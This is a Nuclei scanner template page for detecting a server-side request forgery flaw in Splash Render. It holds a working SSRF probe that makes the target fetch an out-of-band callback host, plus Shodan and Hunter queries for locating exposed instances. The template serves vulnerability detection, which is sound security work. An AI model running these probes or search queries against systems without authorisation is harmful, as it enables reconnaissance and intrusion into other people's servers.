Splash Render - SSRF

ID: splash-render-ssrf

Severity: high

Author: pwnhxl

Tags: splash,ssrf,oast,oss

Description

Splash Render is vulnerable to Server-Side Request Forgery (SSRF) Vulnerability.

YAML Source

id: splash-render-ssrf

info:
  name: Splash Render - SSRF
  author: pwnhxl
  severity: high
  description: Splash Render is vulnerable to Server-Side Request Forgery (SSRF) Vulnerability.
  reference:
    - https://github.com/scrapinghub/splash
    - https://b1ngz.github.io/splash-ssrf-to-get-server-root-privilege/
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Splash"
    hunter-query: web.title="Splash" && header="TwistedWeb"
  tags: splash,ssrf,oast,oss

http:
  - method: GET
    path:
      - "{{BaseURL}}/render.html?url=https://oast.live"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Interactsh Server'

      - type: status
        status:
          - 200
# digest: 490a0046304402204ccb214ee7a1a1670d6c70749997a75f91e064593aab8aaa45075e98366ea3db0220734fb9662ed8e1163ee82b242d128db6b379a8b1e22c84a60256e5a49d3a365a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/vulnerabilities/splash/splash-render-ssrf.yaml"

View on Github